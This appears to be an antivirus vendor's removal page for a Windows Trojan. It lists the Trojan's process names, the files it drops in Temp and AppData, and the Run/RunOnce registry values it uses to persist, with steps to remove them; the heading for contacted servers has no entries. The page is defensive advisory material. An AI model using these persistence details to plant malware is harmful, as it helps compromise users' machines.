The Trojan connects to the servers at the folowing location(s):


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    0c8sG5Y9ZDReGyR0kr6B.exe:2924
    pops.exe:1672
    HaveFun.exe:3352

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\HaveFun.exe.config.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (32 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\pops.exe.config.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe (65224 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe (26099 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "5XTP8SOZXJ5K2MD" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_AKR6B" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "602883" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 2 (1 vote)


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now